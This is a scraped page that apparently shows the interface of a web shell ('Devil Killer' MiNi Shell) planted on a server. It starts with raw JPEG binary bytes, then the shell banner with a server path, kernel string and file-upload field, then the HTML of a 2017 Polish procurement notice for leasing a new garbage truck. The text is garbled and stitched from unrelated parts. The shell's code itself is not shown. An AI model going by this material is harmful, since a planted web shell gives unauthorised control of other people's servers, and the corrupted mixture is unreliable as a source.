JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170426/74207-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.interpromex.pl' target='_blank'>http://www.interpromex.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 74207 - 2017
              z dnia 2017-04-26 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Będzin: Leasing z dostawą nowego pojazdu typu śmieciarka na podwoziu trzyosiowym. <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Przedsiębiorstwo Techniczno-Handlowo-Usługowe INTERPROMEX Spółka z o.o., krajowy numer identyfikacyjny
              345300900000, ul.
              ul. Paryska 
              11,
              42500  
              Będzin, woj.
              śląskie, państwo
              Polska, tel.
              032 2675275 w. 29 267-55-15, e-mail
              marketing@interpromex.pl, faks
              322 673 617.
              <br />
              Adres strony internetowej (URL): www.interpromex.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.interpromex.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Leasing z dostawą nowego pojazdu typu śmieciarka na podwoziu trzyosiowym. <br /><b>Numer referencyjny: </b>ZP-4/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>I. Przedmiot zamówienia:

1. Podwozie: fabrycznie nowe z następującą specyfikacją techniczną  1 sztuka:

-	pojazd fabrycznie nowy (wcześniej nie eksploatowany), wyprodukowany w roku 2016  2017,
-	przystosowanie do zabudowy śmieciarki bezpyłowej o DMC 26 ton,
-	układ napędowy 6x2*4  druga oś napędowa, trzecia skrętna,
-	rozstaw osi 3500 mm,
-	koło kierownicy z lewej strony,
-	blokada mechanizmu różnicowego,
-	zawieszenie przednie resorowe, zawieszenie tylne pneumatyczne,
-	oś wleczona podnoszona,
-	kontrola zawieszenia tylnego za pomocą pilota,
-	hamulce tarczowe, system EBS, ESP- system kontroli trakcji,
-	oś przednia nośność min. 8000 kg,
-	oś tylna napędowa min. 12700 kg,
-	trzecia oś nośność min. 8300 kg, 
-	koł, ogumienie 315/80R22,5, 
-	koło zapasowe  ogumienie 315 /80R22.5, 
-	zderzak przedni plastikowy trójdzielny,
-	silnik o zapłonie samoczynnym, poj. powyżej 9 dm 3, moc min.320 KM, moment, obrotowy min. 1400 Nm,
-	norma emisji spalin Euro 6,
-	silnik wyposażony w odsilnikową przystawkę odbioru mocy,
-	ogranicznik prędkości z nastawą do 85 km/h,
-	zbiornik paliwa o pojemności min. 200 litrów,
-	układ podgrzewania paliwa,
-	zamykany korek wlewu paliwa,
-	zautomatyzowana skrzynia biegów,
-	system HHC ( hill hold control) zapobiegający staczaniu się pojazdu na wzniesieniach,
-	alternator min. 2400 W,
-	akumulator min. 2 x180 Ah + wyłącznik prądu,
-	kabina bez dodatkowej przestrzeni za fotelami tzw. krótka: kolor biały RAL 9010, 3 osobowa, siedzenia w układzie 1+2, 
-	filtr powietrza za kabiną kierowcy,
-	szyby sterowane elektrycznie,
-	podgrzewane lusterka wsteczne regulowane elektrycznie,
-	reflektory halogenowe H7 + światła LED do jazdy dziennej, 
-	światła przednie przeciwmgielne,
-	radio firmowe + CB radio,
-	tachograf, immobilizer fabryczny, gniazdo elektryczne 12V,
-	komputer pokładowy z wyświetlaczem w języku polskim, 
-	fabryczne metalowe osłony boczne tzw. Antyrowerowe,
-	wyposażenie standardowe: apteczka, trójkąt ostrzegawczy, gaśnica
-	wyposażenie dodatkowe: 2 kliny, podnośnik hydrauliczny, narzędzia do obsługi pojazdu,
-	instrukcja obsługi pojazdu w języku polskim,   

2.	Parametry zabudowy (1 sztuka):

	zabudowa fabrycznie nowa (wcześniej nie eksploatowana), wyprodukowana w roku 2016  2017,
	skrzyniowa z urządzaniem zasypowym tylnym przeznaczona do zbierania stałych odpadów komunalnych, surowców wtórnych i odpadów wielkogabarytowych,
	fabrycznie nowa, 
	skrzynia ładunkowa o przekroju prostokątnym, ożebrowana profilem zamkniętym, ściany boczne profilowane, podłoga płaska,
	pojemność skrzyni ładunkowej min. 19 m3,
	skrzynia ładunkowa posiadająca drzwi kontrolne na bocznej ścianie,
	objętość kosza zasypowego min. 1,5 m3,
	dno wanny zasypowej wykonane z jednego kawałka blachy typu Hardox lub równoważnej o gr. min. 8 mm, pozostałe elementy odwłoka z blachy o podwyższonej odporności na ścieranie o gr. min. 4 mm,
	mechanizm zgniatania liniowo  płytowy ( szufladowy)
	minimalny stopień zagęszczenia odpadów min. 1:5,
	możliwość zmiany ciśnienia ( stopnia zagęszczenia) w układzie hydraulicznym  przełączenie w pulpicie w kabinie kierowcy na kilka wariantów: surowce wtórne, gabaryty, papier, komunalne, 
	uniwersalne urządzenie załadowcze dostosowane do współpracy z pojemnikami od 60 do 1100 litrów zgodnych z EN 840 -1, -2, -3,
	urządzenie załadowcze przykręcane do odwłoka, w pełni demontowane,
	urządzenie załadowcze w całości ocynkowane,
	załadunek pojemników bez konieczności zwiększania obrotów silnika (na biegu jałowym podwozia),   
	pulpit sterowniczy umieszczony po prawej stronie zasypu, zamontowany na odchylanym ramieniu, posiadający następujące funkcje: sterowanie wrzutnikiem, start prasy, sygnał dźwiękowy oraz wyłącznik bezpieczeństwa,
	prędkość podnoszenia pojemnika wprost proporcjonalna  do stopnia wychylenia dźwigni na pulpicie sterowniczym,
	dwuetapowy proces podnoszenia pojemnika:
-  prostopadłe unoszenie pojemnika,
-  obrót,
	maksymalny czas opróżniania pojemników: 
  -  dla pojemników dwukołowych max. 8s,
  -  dla pojemników czterokołowych max. 12s,
	część tylna (odwłok) posiadająca automatyczne blokowanie i odblokowywanie,
	siłowniki prasy zgniatającej bez wewnętrznych czujników zbliżeniowych i krańcowych, umieszczone na zewnątrz odwłoka,
	układ uwalniania zakleszczonych przedmiotów,
	kurtyny antykurzowe,
	króciec odpływowy w wannie załadowczej z zaworem kulowym, 
	kamera wraz z mikrofonem umieszczona z tyłu zabudowy oraz monitor i głośnik zainstalowane w kabinie kierowcy,
	min. dwa wyłączniki bezpieczeństwa umieszczone po obu stronach zabudowy, jeden wyłącznik bezpieczeństwa w kabinie kierowcy,
	sterownik dla automatycznego cyklu załadunku oraz cyklu pojedynczego,
	sterowanie ręczne załadunku, 
	sterowanie urządzeniem zasypowym umieszczone po obu stronach odwłoka, 
	sterowanie płytą wypychającą ,,wysuwanie i wsuwanie" odbywa się , ze stanowiska na zewnątrz pojazdu i z kabiny kierowcy,
	możliwość odczytu w urządzeniu rejestrującym liczby cykli pracy: prasy zagęszczającej, podnoszenia i opuszczania odwłoka oraz czasu pracy pompy hydraulicznej, przez osoby nadzorujące pracę obsługi,
	możliwość wykonania autodiagnozy sprawności układu elektrycznego przez urządzenie znajdujące się w kabinie kierowcy,
	zabudowa wyposażona w system centralnego smarowania, 
	instalacja hydrauliczna powinna być zasilana przez pompę dwustrumieniową o wydajności 120 l/ min,
	zabudowa wielokrotnie gruntowana i lakierowana,
	oświetlenie wg obowiązujących przepisów ruchu drogowego: światła hamowania, postojowe, kierunkowskazy, cofania oraz dwa światła alarmowe ,,kogut" w postaci zespolonej lampy LED  LZP 20W 24V lub równoważnej z przodu i z tyłu pojazdu,
	reflektor roboczy w odwłoku,
	pasy odblaskowe (ostrzegawcze) na kabinie i odwłoku,
	błotniki kół tylnych z chlapaczami,
	dwa stopnie dla ładowaczy wraz z czujnikami, informującymi kierowcę o ich zajętości, oraz w przypadku zajętości umożliwiające:
  -  ograniczenie prędkości jazdy do 30 km/h do przodu,
  -  uniemożliwienie cofania pojazdem,
  -  pracę układu ugniatania,        
	sygnał dźwiękowy przy cofaniu się pojazdu do tyłu, 
	zabudowa powinna być wykonana zgodnie z obowiązującymi normami, w tym 
EN  1501-1, odpowiadać wytycznym 89/392 EWG i posiadać znak CE.      

3.	Przy dostawie pojazdu dostawca przekaże:
	świadectwo homologacji dla pojazdu skompletowanego,
	schematy elektryczne i hydrauliczne zabudowy, 
	instrukcję obsługi oraz instrukcję podwozia i zabudowy oraz instrukcję serwisową zabudowy w języku polskim,
	książkę przeglądów dla podwozia i zabudowy,
	katalog części zamiennych dla podwozia i zabudowy w języku polskim. 


II. Warunki gwarancji:

1.	Wykonawca udzieli gwarancji na dostarczony przedmiot zamówienia na warunkach nie gorszych niż określone przez producenta.
2.	Wykonawca udzieli gwarancji liczonej od daty protokolarnego przekazania Zamawiającemu przedmiotu umowy.
3.	Wykonawca zapewni bezpłatne serwisowanie urządzenia w okresie gwarancji. Bezpłatne serwisowanie obejmuje koszty wszystkich zużytych materiałów I części zamiennych, 
a także koszty robocizny oraz planowanych przeglądów technicznych I napraw bieżących, które nie wynikły z winy Zamawiającego, tj. eksploatacji urządzenia niezgodnie z zasadami określonymi w instrukcji obsługi lub innym dokumencie (dokumentach) przekazanych wraz z przedmiotem zamówienia. 
4.	Wraz z przedmiotem umowy Wykonawca zobowiązany jest dostarczyć w języku polskim dokumentację, obowiązująca:
-	instrukcję obsługi,
-	książkę gwarancyjną,
-	wykaz czynności wykonywanych w ramach planowanych przeglądów technicznych oraz potrzebnych materiałów technicznych i części zamiennych,
-	warunki udzielonej gwarancji. 
5.	Gwarancją nie będą objęte wady spowodowane użytkowaniem pojazdu lub jego wyposażenia niezgodnym z załączoną do nich instrukcją obsługi.
6.	Wykonawca zobowiązany jest wydłużyć okres gwarancji za wady fizyczne objęte gwarancją o czas, w którym na skutek wad przedmiotu umowy Zamawiający nie mógł 
z niego korzystać.
7.	W przypadku, kiedy na skutek wad fizycznych zaistnieje potrzeba wymiany pojazdu lub sprzętu stanowiącego jego wyposażenie na nowy, a wskazany w umowie model pojazdu lub sprzętu nie będzie już dostępny do sprzedaży na rynku, Wykonawca może zaproponować Zamawiającemu inny model spełniający wymagania wskazane w pkt. I Przedmiot zamówienia. 
8.	Zamawiający może wykorzystać uprawnienia z tytułu gwarancji za wady fizyczne przedmiotu umowy niezależnie od uprawnień wynikających z rękojmi. 
9.	Gwarancja obejmuje również przedmiot umowy lub usługi nabyte u kooperatorów (podwykonawców) przez Wykonawcę. 
10.	Utrata roszczeń z tytułu wad nie następuje pomimo upływu terminu gwarancji, jeżeli Wykonawca wadę podstępnie zataił. 

III. Usługi serwisowe.

1.	Wykonawca zapewni Zamawiającemu punkt serwisu w odległości nie większej jak 50 km od bazy Spółki Interpromex tj.: ul. Paryska 11 Będzin, mierzony po trasie przejazdu. 
2.	Wykonawca gwarantuje czas reakcji serwisu Wykonawcy do 8 godzin od momentu zgłoszenia przez Zamawiającego z zastrzeżeniem, ze usterki zgłoszone w piątek będą usuwane w następujący po nim poniedziałek. 
3.	Czas naprawy usterek: maksymalnie 3 dni robocze od momentu zgłoszenia.
4.	W przypadku niemożliwości naprawy usterek w ciągu 3 dni roboczych, Wykonawca bezpłatnie udostępni Zamawiającemu pojazd zastępczy. W takim przypadku czas naprawy usterek nie może być dłuższy niż 7 dni roboczych. 
5.	W przypadku unieruchomienia pojazdu Wykonawca zapewni jego dostarczenie (holowanie, laweta) do serwisu. 

IV. Wydanie przedmiotu umowy.

1.	Wykonawca gwarantuje bezpłatną dostawę przedmiotu umowy do siedziby Zamawiającego w nieprzekraczalnym terminie wskazanym w ofercie  termin dostawy przedmiotu zamówienia stanowi kryterium oceny ofert. 
2.	Wydanie przedmiotu umowy nastąpi po uprzednim uzgodnieniu między Wykonawcą 
a Zamawiającym daty i godziny odbioru. 
3.	Odbiór nastąpi w siedzibie Zamawiającego tj. Będzin (42-500) ul. Paryska 11. 
4.	Wykonawca  zagwarantuje bezpłatne szkolenie co najmniej dwóch osób ( dwóch pracowników Zamawiającego) w zakresie obsługi i eksploatacji przedmiotu zamówienia. 
5.	Zamawiający może odmówić odbioru przedmiotu umowy wówczas, gdy:
-	stwierdzi wady przedmiotu umowy,
-	przedmiot umowy nie będzie odpowiadał warunkom określonym w SIWZ i ofercie Wykonawcy.
6.	W przypadku stwierdzenia okoliczność, o których mowa w punkcie 4, Zamawiający wyznaczy Wykonawcy dodatkowy termin na dostarczenie przedmiotu zamówienia zgodnego z SIWZ i wolnego od wad (nie dłuższy niż 4 dni). Po bezskutecznym upływie dodatkowego terminu Zamawiający będzie miał prawo odstąpić od umowy w całości. 
7.	Odbiór przedmiotu umowy zostanie potwierdzony protokołem zdawczo  odbiorczym podpisanym przez osoby upoważnione przez Zamawiającego i wykonawcę. 
8.	Za datę odbioru przedmiotu umowy przyjmuje się dzień sporządzenia protokołu odbioru bez zastrzeżeń.

 

V. Warunki leasingu  istotne postanowienia. 

1.	Leasing finansowy w walucie: złoty polski (PLN).
2.	Leasing finansowy oparty o zmienną stopę bazową WIBOR 1M  z dnia 08.05.2017r.
3.	Okres leasingu: 36 miesięcy.
4.	Wartość pierwszej wpłaty (inicjalnej): 10% wartości ceny oferowanej brutto.
5.	Rodzaj rat leasingowych: 36 równych rat miesięcznych płatnych do 15 każdego miesiąca.
6.	W raty leasingowe mają być wliczone wszystkie koszty, które poniesie Zamawiający jako korzystający. W szczególności cena powinna obejmować: koszt nabycia przedmiotu zamówienia (leasingu), wszelkie podatki i opłaty jakie powinien uiścić Zamawiający 
w związku z zawarciem i wykonaniem umowy leasingu.
7.	Opłatami  rejestracyjnymi, podatkiem od środków transportowych, obciążony zostanie Zamawiający  refaktura.
8.	Opłata za przeniesienie własności w wysokości 1% wartości przedmiotu umowy. 
9.	Opłata za przeniesienie własności zostanie opłacona wraz z ostatnią ratą wynikająca 
z harmonogramu opłat. 
10.	Ubezpieczenie OC, AC i NNW jest po stronie Zamawiającego. Zamawiający zobowiązany będzie przedstawić coroczne polisy ubezpieczenia OC, AC i NNW Wykonawcy. Zamawiający nie będzie ponosił z tego tytułu żadnych opłat i kosztów. 
11.	W umowie leasingu winna zostać zawarta klauzula dopuszczająca doposażenie przedmiotu zamówienia w urządzenia typu: sonda paliwowa, GPS.
12.	Nie dopuszcza się weksla In blanco.
13.	Wykonawca (leasingodawca), którego oferta zostanie wybrana będzie zobowiązany do zawarcia umowy leasingu.
14.	Wzór umowy leasingu, określający warunki leasingu z uwzględnieniem warunków określonych przez Zamawiającego, Wykonawca dołączy do oferty wraz z regulaminem obowiązującym u leasingodawcy (ogólne warunki leasingu).
15.	Integralną część umowy stanowić będą załączniki: harmonogram opłat, protokół zdawczo  odbiorczy przekazania przedmiotu umowy leasingu, opis przedmiotu leasingu wraz 
z wymaganymi dokumentami zgodnie z SIWZ. 
16.	Przedstawienie przez Wykonawcę umowy niespełniającej wymogów określonych 
w SIWZ, Ogólnych warunkach leasingu traktowane będzie jako okoliczność uniemożliwiająca zawarcie ważnej umowy z przyczyn leżących po stronie Wykonawcy. 

 
<br /><br /><b>II.5) Główny kod CPV: </b>66114000-2<br /><b> Dodatkowe kody CPV:</b>34144510-6,
                34144512-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 30<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                -  Zamawiający nie wprowadza żadnych szczegółów, ocena spełniania warunku odbędzie się na podstawie złożonego oświadczenia.<br />
                Informacje dodatkowe
                Wykonawca wraz z ofertą składa załącznik nr 4 do SIWZ<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                -  Zamawiający nie wprowadza żadnych szczegółów, ocena spełniania warunku odbędzie się na podstawie złożonego oświadczenia.<br />
                Informacje dodatkowe
                Wykonawca wraz z ofertą składa załącznik nr 4 do SIWZ<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca musi wykazać, iż w ciągu ostatnich trzech lat  przed terminem składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał lub wykonuje 3 dostawy odpowiadające swoim zakresem przedmiotowemu postępowaniu tj.: dostawę nowego pojazdu specjalnego typu śmieciarka  o wartości minimum: 600 000,00 zł netto każda wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                W celu potwierdzenia ww. warunku należy złożyć w ofercie wypełniony Załącznik 
nr 6 do SIWZ. 
Na wezwanie Zamawiającego, Wykonawca składa aktualne na dzień składania ofert referencje lub inne dokumenty określające: datę wykonania, podmiot, przedmiot oraz wartość wykonanych lub wykonywanych dostaw. 
Złożone dokumenty powinny potwierdzać, że dostawy (wykazane w złożonym załączniku 
nr 6) zostały wykonane lub są wykonywane należycie.
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
